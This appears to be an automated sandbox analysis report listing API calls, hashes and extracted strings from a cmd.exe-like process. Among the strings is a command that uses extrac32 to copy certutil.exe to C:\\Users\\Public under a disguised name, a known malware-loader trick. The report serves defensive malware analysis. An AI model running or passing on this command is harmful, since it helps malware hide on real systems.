                                                                                      • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                      • Instruction Fuzzy Hash: EE41C731A08B4586E260AF25A484379FA99F74DBA5F958334DA6E233D0CF3CD949C750
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                                      • String ID: PE
                                                                                      • API String ID: 2941894976-4258593460
                                                                                      • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                      • Instruction ID: 25c92d2705f0dd580362b13103827649c9f2bc274b8bea242f0330990ce49844
                                                                                      • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                      • Instruction Fuzzy Hash: CB41A571608A8286F6F0AB21E490279F7A5FB8DB91F844134DE5D13B95DF3CE445CB22
                                                                                      APIs
                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF79376849D,?,?,?,00007FF79376F0C7), ref: 00007FF793750045
                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF79376F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF793750071
                                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793750092
                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7937500A7
                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793750148
                                                                                      • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF793750181
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                                                      • String ID:
                                                                                      • API String ID: 734197835-0
                                                                                      • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                      • Instruction ID: 199d69c165c5c9dca4e53d2adc9eaa347c793ab30c8238378622747c866b68fc
                                                                                      • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                      • Instruction Fuzzy Hash: 5361C33290C69286F7B4AB35A880339FA99FB4EB45F848136DD4E63790DF3CA405C760
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Enum$Openwcsrchr
                                                                                      • String ID: %s=%s$.$\Shell\Open\Command
                                                                                      • API String ID: 3402383852-1459555574
                                                                                      • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                      • Instruction ID: 6a30e60a7de614da88fb3ce901adc460f22ce2881e0dca574eecd29b3e44fc9d
                                                                                      • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                      • Instruction Fuzzy Hash: 74A1EA22A08A4182FBB0AB75D0A01B9E2AAEF4A794FC04535D94D277C5DF7CE901C721
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: memset$wcscmp
                                                                                      • String ID: %s
                                                                                      • API String ID: 243296809-3043279178
                                                                                      • Opcode ID: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                                                                      • Instruction ID: cd72678292252cf8e3237e4e053a9490476feb6dafcd6bdd26f155330e76e73b
                                                                                      • Opcode Fuzzy Hash: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                                                                      • Instruction Fuzzy Hash: BAA18E227097C696FBB9EB31D8803F9A399EB4C748F90443ACA4D5B695DF3CE6458310
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: memset$EnvironmentVariable
                                                                                      • String ID: DIRCMD
                                                                                      • API String ID: 1405722092-1465291664
                                                                                      • Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                                      • Instruction ID: 6c47cb72964862819b173c119f86f01769876ac60c0abc8c606b81f807bcdd8d
                                                                                      • Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                                      • Instruction Fuzzy Hash: 05815C72A08BC28AEB70DF30E8842ED77A9FB48748F504139DA8D67B58DF38E1558710
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF79374CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDA6
                                                                                        • Part of subcall function 00007FF79374CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDBD
                                                                                      • wcschr.MSVCRT(?,?,?,00007FF7937499DD), ref: 00007FF793749A39
                                                                                        • Part of subcall function 00007FF79374DF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF79374CEAA), ref: 00007FF79374DFB8
                                                                                        • Part of subcall function 00007FF79374DF60: RtlFreeHeap.NTDLL ref: 00007FF79374DFCC
                                                                                        • Part of subcall function 00007FF79374DF60: _setjmp.MSVCRT ref: 00007FF79374E03E
                                                                                      • wcschr.MSVCRT(?,?,?,00007FF7937499DD), ref: 00007FF793749AF0
                                                                                      • wcschr.MSVCRT(?,?,?,00007FF7937499DD), ref: 00007FF793749B0F
                                                                                        • Part of subcall function 00007FF7937496E8: memset.MSVCRT ref: 00007FF7937497B2
                                                                                        • Part of subcall function 00007FF7937496E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF793749880
                                                                                      • _wcsupr.MSVCRT ref: 00007FF79375B844
                                                                                      • wcscmp.MSVCRT ref: 00007FF79375B86D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                                                                      • String ID: FOR$ IF
                                                                                      • API String ID: 3663254013-2924197646
                                                                                      • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                      • Instruction ID: 1e64c6cadafdff8e33b126b744d593b533debeece80f10416ee2bb1fd5f00ac9
                                                                                      • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                      • Instruction Fuzzy Hash: E451A220B0964281FEB8BB3694D4279A6DABF4DB90FC85636D91E277D1DE3CB401C360
                                                                                      APIs
                                                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F0D6
                                                                                      • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF79374E626,?,?,00000000,00007FF793751F69), ref: 00007FF79374F1BA
                                                                                      • wcschr.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F1E7
                                                                                      • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF79374E626,?,?,00000000,00007FF793751F69), ref: 00007FF79374F1FF
                                                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F2BB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: iswdigit$iswspacewcschr
                                                                                      • String ID: )$=,;
                                                                                      • API String ID: 1959970872-2167043656
                                                                                      • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                      • Instruction ID: 7eb312de1276f8643cd72cb47c90f3d85cd667fa2d3e274b73f345b1ad2c8887
                                                                                      • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                      • Instruction Fuzzy Hash: 31418C61E0825285FBF46B35A5C8379F6EAEF5D751FC45832CA8D622A0DF3CB4818721
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                      • String ID: %04X-%04X$:
                                                                                      • API String ID: 930873262-1938371929
                                                                                      • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                      • Instruction ID: 4394bda53a9db24460405ee260c80b85cc34baa92838500d6694680f84134c28
                                                                                      • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                      • Instruction Fuzzy Hash: A1417E21A08A42D2FBB4AB31E4902BAE2A8EB8D745FC04136D94E626D5DF3CE545C731
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                      • API String ID: 3249344982-2616576482
                                                                                      • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                      • Instruction ID: 5e68441ee6b38000b3bf6e4170fde28ccb5100a84c24370abaec5018c07da212
                                                                                      • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                      • Instruction Fuzzy Hash: 45417471A18B4186F3A09F21A8C4375FAA8FB4DBD5F844635DA4E177A4CF3CD1148B60
                                                                                      APIs
                                                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF7937568A3,?,?,?,?,?,?,?,00000000,?,00007FF7937563F3), ref: 00007FF793756A73
                                                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7937568A3,?,?,?,?,?,?,?,00000000,?,00007FF7937563F3), ref: 00007FF793756A91
                                                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7937568A3,?,?,?,?,?,?,?,00000000,?,00007FF7937563F3), ref: 00007FF793756AB0
                                                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7937568A3,?,?,?,?,?,?,?,00000000,?,00007FF7937563F3), ref: 00007FF793756AE3
                                                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7937568A3,?,?,?,?,?,?,?,00000000,?,00007FF7937563F3), ref: 00007FF793756B01
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: wcschr$iswdigit
                                                                                      • String ID: +-~!$<>+-*/%()|^&=,
                                                                                      • API String ID: 2770779731-632268628
                                                                                      • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                      • Instruction ID: cb75569182bc531550625099640aac7d6d9c080a047c7177362a0eb5fee8bddb
                                                                                      • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                      • Instruction Fuzzy Hash: BF316E22A08B56C5EBA4AF21E4C0279B7E4FB8CF41B959036DA4E13394EF3CE400C720
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                      • String ID:
                                                                                      • API String ID: 3192234081-0
                                                                                      • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                      • Instruction ID: 0ff2e558aa32c9a2f44fb95e8a05f1cbb21c371eb831963e6b91deebce412738
                                                                                      • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                      • Instruction Fuzzy Hash: B931AF31708A418BF7A0AF31A48467DFBA5FB8DB85F849134DE8A57791CE3CE4018B10
                                                                                      APIs
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7937514D6,?,?,?,00007FF79374AA22,?,?,?,00007FF79374847E), ref: 00007FF793751673
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7937514D6,?,?,?,00007FF79374AA22,?,?,?,00007FF79374847E), ref: 00007FF79375168D
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7937514D6,?,?,?,00007FF79374AA22,?,?,?,00007FF79374847E), ref: 00007FF793751757
                                                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7937514D6,?,?,?,00007FF79374AA22,?,?,?,00007FF79374847E), ref: 00007FF79375176E
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7937514D6,?,?,?,00007FF79374AA22,?,?,?,00007FF79374847E), ref: 00007FF793751788
                                                                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7937514D6,?,?,?,00007FF79374AA22,?,?,?,00007FF79374847E), ref: 00007FF79375179C
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$Alloc$Size
                                                                                      • String ID:
                                                                                      • API String ID: 3586862581-0
                                                                                      • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                      • Instruction ID: d48250405503887afc0ad6b4c53db02baef136608bb2bacf61f7d52518a9126b
                                                                                      • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                      • Instruction Fuzzy Hash: 74917321A1964681FEB8AB29D4C0279F7A9FB4CB95F958536CE4D233A0DF3CE441C720
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                      • String ID:
                                                                                      • API String ID: 1313749407-0
                                                                                      • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                      • Instruction ID: 1b03ade12f9dc9727ebc4b9c2f2b3a89f83707dde52982aef290603d06e24474
                                                                                      • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                      • Instruction Fuzzy Hash: 4451D621B0868293FAB8BB319494179E699FF4DBA0F885635DD1E277D0DF3CE8418660
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                      • String ID:
                                                                                      • API String ID: 920682188-0
                                                                                      • Opcode ID: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                                                                      • Instruction ID: 60605cfaa44b2aa2c4fd0b36cf9ab0f546ef366af94a0034af23d099fcbf00aa
                                                                                      • Opcode Fuzzy Hash: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                                                                      • Instruction Fuzzy Hash: E3512732705B818AEB75EF20D8942E8B7A5FB8CB85F848135CA4E57754DF3CD6458720
                                                                                      APIs
                                                                                      Strings
                                                                                      • extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF79374E00B
                                                                                      Similarity
                                                                                      • API ID: Heap$FreeProcess_setjmp
                                                                                      • String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                      • API String ID: 777023205-3344945345
                                                                                      • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                      • Instruction ID: 72caf930f3d3f453b7990b2e2a5b457e2ff97f6c6fdc285193a4e83e12745cad
                                                                                      • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                      • Instruction Fuzzy Hash: BC513730A0DA4289FBB0AF35A8C4278FBA9BF4C760FE44535D94D627A1DF3CB4418621
                                                                                      APIs
                                                                                      • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF79374E626,?,?,00000000,00007FF793751F69), ref: 00007FF79374F1BA
                                                                                      • wcschr.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F1E7
                                                                                      • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF79374E626,?,?,00000000,00007FF793751F69), ref: 00007FF79374F1FF
                                                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F2BB
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: iswdigit$iswspacewcschr
                                                                                      • String ID: )$=,;
                                                                                      • API String ID: 1959970872-2167043656
                                                                                      • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                      • Instruction ID: bf1ab16163a5d6e7d6bf5aafdd319645c36d9fe716b3c08c2a7ff3062f9b9cb0
                                                                                      • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                      • Instruction Fuzzy Hash: C8417B64E0825786FBF46B3499C8279F6EAEF1D751FC45832C98D222A0DF3CB8418631
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsnicmpfprintfwcsrchr
                                                                                      • String ID: CMD Internal Error %s$%s$Null environment
                                                                                      • API String ID: 3625580822-2781220306
                                                                                      • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                      • Instruction ID: e34f0f1dd9925602b2be8c04aaa7a72a4ca29cf68e8d94d75014c779e41a0a94
                                                                                      • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                      • Instruction Fuzzy Hash: 6A31D721A08A4686FBF46B6195901B9F25ABB4EB98F844130CD1E37795DE3CE445C321
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memsetwcsspn
                                                                                      • String ID:
                                                                                      • API String ID: 3809306610-0
                                                                                      • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                      • Instruction ID: 2dafa4c9f4fa41df8e9d50d18ab67f79814cd1a48ef63879ecfecb84a0e62c57
                                                                                      • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                      • Instruction Fuzzy Hash: FEB19662A0874681EAA4EF25E490279E7A9FB5CB80FC58032DA4E67791DF7CE441C720
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$iswdigit$wcstol
                                                                                      • String ID:
                                                                                      • API String ID: 3841054028-0
                                                                                      • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                      • Instruction ID: 72775493c192d36715b9cc2eecc7d2580efb2e91c676251f7f62ccced9c8acc1
                                                                                      • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                      • Instruction Fuzzy Hash: CE510723A04A52A1F7B4AB35D4A01B9B6A5FF6C759BC48231DE5D622D0DF3CE841C231
                                                                                      APIs
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793763687
                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF79374260D), ref: 00007FF7937636A6
                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF79374260D), ref: 00007FF7937636EB
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793763703
                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF79374260D), ref: 00007FF793763722
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Console$Write_get_osfhandle$Mode
                                                                                      • String ID:
                                                                                      • API String ID: 1066134489-0
                                                                                      • Opcode ID: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                      • Instruction ID: bfdd1e0dac840a64111e0a2fbfe54a48558b0e9ffc3113f6a21c7e3f40089f8b
                                                                                      • Opcode Fuzzy Hash: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                      • Instruction Fuzzy Hash: 8B51B421B08A4687FAB46F319494679E6A9EF4C795F884439CE4E237A0DF3CE440CB31
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                      • String ID:
                                                                                      • API String ID: 850181435-0
                                                                                      • Opcode ID: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                                                                      • Instruction ID: 520bc9c30a68df39165a2460b21cb826533a49a27cca6ea12673be0cf855ca64
                                                                                      • Opcode Fuzzy Hash: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                                                                      • Instruction Fuzzy Hash: 63417F32608BC5C9E7B09F30D8842E9B7A9FB8DB85F944525DA4E5BB48CF38D645C710
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF793753578: _get_osfhandle.MSVCRT ref: 00007FF793753584
                                                                                        • Part of subcall function 00007FF793753578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF79375359C
                                                                                        • Part of subcall function 00007FF793753578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535C3
                                                                                        • Part of subcall function 00007FF793753578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535D9
                                                                                        • Part of subcall function 00007FF793753578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535ED
                                                                                        • Part of subcall function 00007FF793753578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF793753602
                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF793753514
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793753522
                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF793753541
                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF79375355E
                                                                                        • Part of subcall function 00007FF7937536EC: _get_osfhandle.MSVCRT ref: 00007FF793753715
                                                                                        • Part of subcall function 00007FF7937536EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF793753770
                                                                                        • Part of subcall function 00007FF7937536EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793753791
                                                                                      Memory Dump Source
